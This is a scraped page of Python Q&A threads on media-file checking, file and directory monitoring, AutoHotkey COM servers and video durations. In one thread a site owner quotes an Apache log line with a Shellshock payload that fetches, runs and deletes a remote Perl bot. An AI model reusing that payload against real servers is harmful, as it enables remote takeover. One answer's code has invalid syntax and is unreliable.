Verify mediafiles with libVLC and Python

Verify mediafiles with libVLC and Python - python

I'm trying to find out wether a mediafile "could" be played back in VLC using LibVLC-Python.
In my python script I parse recursively through a directory (containing media and non-media-files as well as images etc.), opening and playing one file after another in VLC. Then I try to analyse, if it can actually be played with the vlc-functions will_play() and get_state(). This is highly unreliable though and the script has to pause in order to fully load the file. If an audio-file for example is very short and the script pauses to long it will not be detected as "playable" since it's playback has already stopped etc. If the script runs across a JPG it hangs up and sometimes text- and pdf-files will be labeled "will_play" :-( So far I was not able to use vlc-classes such as MediaTrackInfo()
Is there a way to just parse each file and determine i.e. by it's codec if VLC could play it? I just want to sort through huge directories and copy out "real" mediafiles (audio and video) that are not corrupted.
Here's my original script:
import os, sys, inspect, time
vlcpfad = "C:\Program Files (x86)\VideoLAN\VLC"
if not vlcpfad in sys.path:
sys.path.append(vlcpfad)
import vlc
# Get name and path of the script
pfadkomplett = os.path.realpath(os.path.abspath(inspect.getfile(inspect.currentframe())))
pfad = os.path.split(pfadkomplett)[0]
skriptname = os.path.split(pfadkomplett)[1]
# walk path
for pfad, unterordner, dateien in os.walk(pfad):
for dateiname in dateien:
# skip script itself
if dateiname == skriptname: continue
dateipfad = os.path.join(pfad, dateiname)
p = vlc.MediaPlayer(dateipfad)
p.audio_toggle_mute()
p.play()
# Wait a bit, so vlc can start playback
time.sleep(0.2)
while str(p.get_state()) == "State.Opening":
time.sleep(0.1)
print(dateipfad + ": " + str(p.will_play()))
p.stop()
del p

One way is to test if media is OK before play it :
[...]
p = vlc.MediaPlayer(dateipfad)
media = p.get_media()
media.parse() #get media info
if media.get_duration():
# your is OK
else:
# media NOK

Related

python: monitor updates in /proc/mydev file

I wrote a kernel module that writes in /proc/mydev to notify the python program in userspace. I want to trigger a function in the python program whenever there is an update of data in /proc/mydev from the kernel module. What is the best way to listen for an update here? I am thinking about using "watchdog" (https://pythonhosted.org/watchdog/). Is there a better way for this?

This is an easy and efficient way:
import os
from time import sleep
from datetime import datetime
def myfuction(_time):
print("file modified, time: "+datetime.fromtimestamp(_time).strftime("%H:%M:%S"))
if __name__ == "__main__":
_time = 0
while True:
last_modified_time = os.stat("/proc/mydev").st_mtime
if last_modified_time > _time:
myfuction(last_modified_time)
_time = last_modified_time
sleep(1) # prevent high cpu usage
result:
file modified, time: 11:44:09
file modified, time: 11:46:15
file modified, time: 11:46:24
The while loop guarantees that the program keeps listening to changes forever.
You can set the interval by changing the sleep time. Low sleep time causes high CPU usage.

import time
import os
# get the file descriptor for the proc file
fd = os.open("/proc/mydev", os.O_RDONLY)
# create a polling object to monitor the file for updates
poller = select.poll()
poller.register(fd, select.POLLIN)
# create a loop to monitor the file for updates
while True:
events = poller.poll(10000)
if len(events) > 0:
# read the contents of the file if updated
print(os.read(fd, 1024))

sudo pip install inotify
Example
Code for monitoring a simple, flat path (see “Recursive Watching” for watching a hierarchical structure):
import inotify.adapters
def _main():
i = inotify.adapters.Inotify()
i.add_watch('/tmp')
with open('/tmp/test_file', 'w'):
pass
for event in i.event_gen(yield_nones=False):
(_, type_names, path, filename) = event
print("PATH=[{}] FILENAME=[{}] EVENT_TYPES={}".format(
path, filename, type_names))
if __name__ == '__main__':
_main()
Expected output:
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_MODIFY']
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_OPEN']
PATH=[/tmp] FILENAME=[test_file] EVENT_TYPES=['IN_CLOSE_WRITE']

I'm not sure if this would work for your situation, since it seems that you're wanting to watch a folder, but this program watches a file at a time until the main() loop repeats:
import os
import time
def main():
contents = os.listdir("/proc/mydev")
for file in contents:
f = open("/proc/mydev/" + file, "r")
init = f.read()
f.close()
while different = false:
f = open("/proc/mydev/" + file, "r")
check = f.read()
f.close()
if init !== check:
different = true
else:
different = false
time.sleep(1)
main()
# Write what you would want to happen if a change occured here...
main()
main()
main()
You could then write what you would want to happen right before the last usage of main(), as it would then repeat.
Also, this may contain errors, since I rushed this.
Hope this at least helps!

You can't do this efficiently without modifying your kernel driver.
Instead of using procfs, have it register a new character device under /dev, and write that driver to make new content available to read from that device only when new content has in fact come in from the underlying hardware, such that the application layer can issue a blocking read and have it return only when new content exists.
A good example to work from (which also has plenty of native Python clients) is the evdev devices in the input core.

How to program hotstrings in python like in autohotkey

I want to make hotstrings in python that converts one word when typed into another after some processing, since AHK is very limiting when it comes to determining which word to type. Right now, I am using a hotstring in ahk that runs code on the command line that runs a python script with the word that I typed as arguments. Then I use pyautogui to type the word. However, this is very slow and does not work when typing at speed. I'm looking for a way to do this all with python and without ahk, but I have not found a way to do hotstrings in python. For example, every time I type the word "test" it replaces it with "testing." Thanks for your help. I'm running the latest version of Python and Windows 10 if that is useful to anyone by the way.

(if you want to process it as each letter is typed(t,te,tes,test), you should edit your question)
I call my SymPy functions using ahk hotkeys. I register the python script as a COM server and load it using ahk.
I do not notice any latency.
you'll need pywin32, but don't download using pip install pywin32
download from https://github.com/mhammond/pywin32/releases
OR ELSE IT WON'T WORK for AutoHotkeyU64.exe, it will only work for AutoHotkeyU32.exe.
make sure to download amd64, (I downloaded pywin32-300.win-amd64-py3.8.exe)
here's why: how to register a 64bit python COM server
toUppercase COM server.py
class BasicServer:
# list of all method names exposed to COM
_public_methods_ = ["toUppercase"]
#staticmethod
def toUppercase(string):
return string.upper()
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print("Error: need to supply arg (""--register"" or ""--unregister"")")
sys.exit(1)
else:
import win32com.server.register
import win32com.server.exception
# this server's CLSID
# NEVER copy the following ID
# Use "print(pythoncom.CreateGuid())" to make a new one.
myClsid="{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}"
# this server's (user-friendly) program ID
myProgID="Python.stringUppercaser"
import ctypes
def make_sure_is_admin():
try:
if ctypes.windll.shell32.IsUserAnAdmin():
return
except:
pass
exit("YOU MUST RUN THIS AS ADMIN")
if sys.argv[1] == "--register":
make_sure_is_admin()
import pythoncom
import os.path
realPath = os.path.realpath(__file__)
dirName = os.path.dirname(realPath)
nameOfThisFile = os.path.basename(realPath)
nameNoExt = os.path.splitext(nameOfThisFile)[0]
# stuff will be written here
# HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\${myClsid}
# HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}
# and here
# HKEY_LOCAL_MACHINE\SOFTWARE\Classes\${myProgID}
# HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Python.stringUppercaser
win32com.server.register.RegisterServer(
clsid=myClsid,
# I guess this is {fileNameNoExt}.{className}
pythonInstString=nameNoExt + ".BasicServer", #toUppercase COM server.BasicServer
progID=myProgID,
# optional description
desc="return uppercased string",
#we only want the registry key LocalServer32
#we DO NOT WANT InProcServer32: pythoncom39.dll, NO NO NO
clsctx=pythoncom.CLSCTX_LOCAL_SERVER,
#this is needed if this file isn't in PYTHONPATH: it tells regedit which directory this file is located
#this will write HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}\PythonCOMPath : dirName
addnPath=dirName,
)
print("Registered COM server.")
# don't use UseCommandLine(), as it will write InProcServer32: pythoncom39.dll
# win32com.server.register.UseCommandLine(BasicServer)
elif sys.argv[1] == "--unregister":
make_sure_is_admin()
print("Starting to unregister...")
win32com.server.register.UnregisterServer(myClsid, myProgID)
print("Unregistered COM server.")
else:
print("Error: arg not recognized")
you first need to register the python COM server:
first, get your own CLSID: just use a python shell.
import pythoncom
print(pythoncom.CreateGuid())
then, set myClsid to that output
to register:
python "toUppercase COM server.py" --register
to unregister:
python "toUppercase COM server.py" --unregister
hotstring python toUppercase.ahk
#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
#SingleInstance, force
SendMode Input ; Recommended for new scripts due to its superior speed and reliability.
SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
SetBatchLines, -1
#KeyHistory 0
ListLines Off
#Persistent
#MaxThreadsPerHotkey 4
pythonComServer:=ComObjCreate("Python.stringUppercaser")
; OR
; pythonComServer:=ComObjCreate("{C70F3BF7-2947-4F87-B31E-9F5B8B13D24F}") ;use your own CLSID
; * do not wait for string to end
; C case sensitive
:*:hello world::
savedHotstring:=A_ThisHotkey
;theActualHotstring=savedHotstring[second colon:end of string]
theActualHotstring:=SubStr(savedHotstring, InStr(savedHotstring, ":",, 2) + 1)
send, % pythonComServer.toUppercase(theActualHotstring)
return
f3::Exitapp
you can test the speed of hotstring hello world, it's very fast for me.
Edit def toUppercase(string): to your liking

Subprocess.Popen only runs second time

I have a boot controller which runs a boot.py file contained in each folder of each tool i am trying to deploy. I want my boot controller to run all of these boot files simultaneously. The config file has the tool names and the versions desired, which help to generate the path to the boot.py.
def run_boot():
config_file = get_config_file()
parse_config_file.init(config_file)
tools = parse_config_file.get_tools_to_deploy()
#tools is now a list of tool names
top_dir = os.getcwd()
for tool in tools:
ver = parse_config_file.get_tool_version(tool).strip()
boot_file_path = "{0}\\Deploy\\{1}\\{2}".format(os.getcwd(),tool,ver)
try:
subprocess.Popen('boot.py', shell=True, cwd=boot_file_path)
except:
print ("{0} failed to open".format(tool))
print(tool, boot_file_path)
os.chdir(top_dir)
The first time i run this, the print(tool, boot_file_path) executes but the processes do not. the second time it is run the processes do open. I cannot find a reason for this.

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.

The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.

The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.

I got some solution,
solution 1 (CPU usage: 27.9% approx= 30%):
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
after = dict ([(f, None) for f in os.listdir (path_to_watch)])
added = [f for f in after if not f in before]
if added:
print("Added: ", ", ".join (added))
break
else:
before = after
I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was made in python 2x so you need to convert it in python 3.
NOTE:-
WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.
Solution 2 (CPU usage: 23.4 approx=20%)
import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
while 1:
b=os.listdir(path)
path_len_final=len(b)
if path_len_org<path_len_final:
return "A file is added"
elif path_len_org>path_len_final:
return "A file is removed"
else:
pass
file_check()

Get total length of videos in a particular directory in python

I have downloaded a bunch of videos from coursera.org and have them stored in one particular folder. There are many individual videos in a particular folder (Coursera breaks a lecture into multiple short videos). I would like to have a python script which gives the combined length of all the videos in a particular directory. The video files are .mp4 format.

First, install the ffprobe command (it's part of FFmpeg) with
sudo apt install ffmpeg
then use subprocess.run() to run this bash command:
ffprobe -v error -show_entries format=duration -of default=noprint_wrappers=1:nokey=1 -- <filename>
(which I got from http://trac.ffmpeg.org/wiki/FFprobeTips#Formatcontainerduration), like this:
from pathlib import Path
import subprocess
def video_length_seconds(filename):
result = subprocess.run(
[
"ffprobe",
"-v",
"error",
"-show_entries",
"format=duration",
"-of",
"default=noprint_wrappers=1:nokey=1",
"--",
filename,
],
capture_output=True,
text=True,
)
try:
return float(result.stdout)
except ValueError:
raise ValueError(result.stderr.rstrip("\n"))
# a single video
video_length_seconds('your_video.webm')
# all mp4 files in the current directory (seconds)
print(sum(video_length_seconds(f) for f in Path(".").glob("*.mp4")))
# all mp4 files in the current directory and all its subdirectories
# `rglob` instead of `glob`
print(sum(video_length_seconds(f) for f in Path(".").rglob("*.mp4")))
# all files in the current directory
print(sum(video_length_seconds(f) for f in Path(".").iterdir() if f.is_file()))
This code requires Python 3.7+ because that's when text= and capture_output= were added to subprocess.run. If you're using an older Python version, check the edit history of this answer.

Download MediaInfo and install it (don't install the bundled adware)
Go to the MediaInfo source downloads and in the "Source code, All included" row, choose the link next to "libmediainfo"
Find MediaInfoDLL3.py in the downloaded archive and extract it anywhere.
Example location: libmediainfo_0.7.62_AllInclusive.7z\MediaInfoLib\Source\MediaInfoDLL\MediaInfoDLL3.py
Now make a script for testing (sources below) in the same directory.
Execute the script.
MediaInfo works on POSIX too. The only difference is that an so is loaded instead of a DLL.
Test script (Python 3!)
import os
os.chdir(os.environ["PROGRAMFILES"] + "\\mediainfo")
from MediaInfoDLL3 import MediaInfo, Stream
MI = MediaInfo()
def get_lengths_in_milliseconds_of_directory(prefix):
for f in os.listdir(prefix):
MI.Open(prefix + f)
duration_string = MI.Get(Stream.Video, 0, "Duration")
try:
duration = int(duration_string)
yield duration
print("{} is {} milliseconds long".format(f, duration))
except ValueError:
print("{} ain't no media file!".format(f))
MI.Close()
print(sum(get_lengths_in_milliseconds_of_directory(os.environ["windir"] + "\\Performance\\WinSAT\\"
)), "milliseconds of content in total")

In addition to Janus Troelsen's answer above, I would like to point out a small problem I
encountered when implementing his answer. I followed his instructions one by one but had different results on windows (7) and linux (ubuntu). His instructions worked perfectly under linux but I had to do a small hack to get it to work on windows. I am using a 32-bit python 2.7.2 interpreter on windows so I utilized MediaInfoDLL.py. But that was not enough to get it to work for me I was receiving this error at this point in the process:
"WindowsError: [Error 193] %1 is not a valid Win32 application".
This meant that I was somehow using a resource that was not 32-bit, it had to be the DLL MediaInfoDLL.py was loading. If you look at the MediaInfo intallation directory you will see 3 dlls MediaInfo.dll is 64-bit while MediaInfo_i386.dll is 32-bit. MediaInfo_i386.dll is the one which I had to use because of my python setup. I went to
MediaInfoDLL.py (which I already had included in my project) and changed this line:
MediaInfoDLL_Handler = windll.MediaInfo
to
MediaInfoDLL_Handler = WinDLL("C:\Program Files (x86)\MediaInfo\MediaInfo_i386.dll")
I didn't have to change anything for it to work in linux

Nowadays pymediainfo is available, so Janus Troelsen's answer could be simplified.
You need to install MediaInfo and pip install pymediainfo. Then the following code would print you the total length of all video files:
import os
from pymediainfo import MediaInfo
def get_track_len(file_path):
media_info = MediaInfo.parse(file_path)
for track in media_info.tracks:
if track.track_type == "Video":
return int(track.duration)
return 0
print(sum(get_track_len(f) for f in os.listdir('directory with video files')))

This link shows how to get the length of a video file https://stackoverflow.com/a/3844467/735204
import subprocess
def getLength(filename):
result = subprocess.Popen(["ffprobe", filename],
stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
return [x for x in result.stdout.readlines() if "Duration" in x]
If you're using that function, you can then wrap it up with something like
import os
for f in os.listdir('.'):
print "%s: %s" % (f, getLength(f))

Here's my take. I did this on Windows. I took the answer from Federico above, and changed the python program a little bit to traverse a tree of folders with video files. So you need to go above to see Federico's answer, to install MediaInfo and to pip install pymediainfo, and then write this program, summarize.py:
import os
import sys
from pymediainfo import MediaInfo
number_of_video_files = 0
def get_alternate_len(media_info):
myJson = media_info.to_data()
myArray = myJson['tracks']
for track in myArray:
if track['track_type'] == 'General' or track['track_type'] == 'Video':
if 'duration' in track:
return int(track['duration'] / 1000)
return 0
def get_track_len(file_path):
global number_of_video_files
media_info = MediaInfo.parse(file_path)
for track in media_info.tracks:
if track.track_type == "Video":
number_of_video_files += 1
if type(track.duration) == int:
len_in_sec = int(track.duration / 1000)
elif type(track.duration) == str:
len_in_sec = int(float(track.duration) / 1000)
else:
len_in_sec = get_alternate_len(media_info)
if len_in_sec == 0:
print("File path = " + file_path + ", problem in type of track.duration")
return len_in_sec
return 0
sum_in_secs = 0.0
os.chdir(sys.argv[1])
for root, dirs, files in os.walk("."):
for name in files:
sum_in_secs += get_track_len(os.path.join(root, name))
hours = int(sum_in_secs / 3600)
remain = sum_in_secs - hours * 3600
minutes = int(remain / 60)
seconds = remain - minutes * 60
print("Directory: " + sys.argv[1])
print("Total number of video files is " + str(number_of_video_files))
print("Length: %d:%02d:%02d" % (hours, minutes, seconds))
Run it: python summarize.py <DirPath>
Have fun. I found I have about 1800 hours of videos waiting for me to have some free time. Yeah sure

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

Verify mediafiles with libVLC and Python - python

One way is to test if media is OK before play it : [...] p = vlc.MediaPlayer(dateipfad) media = p.get_media() media.parse() #get media info if media.get_duration(): # your is OK else: # media NOK

Related

python: monitor updates in /proc/mydev file

How to program hotstrings in python like in autohotkey

Subprocess.Popen only runs second time

A python script to monitor a directory for new files

Get total length of videos in a particular directory in python

Categories

Resources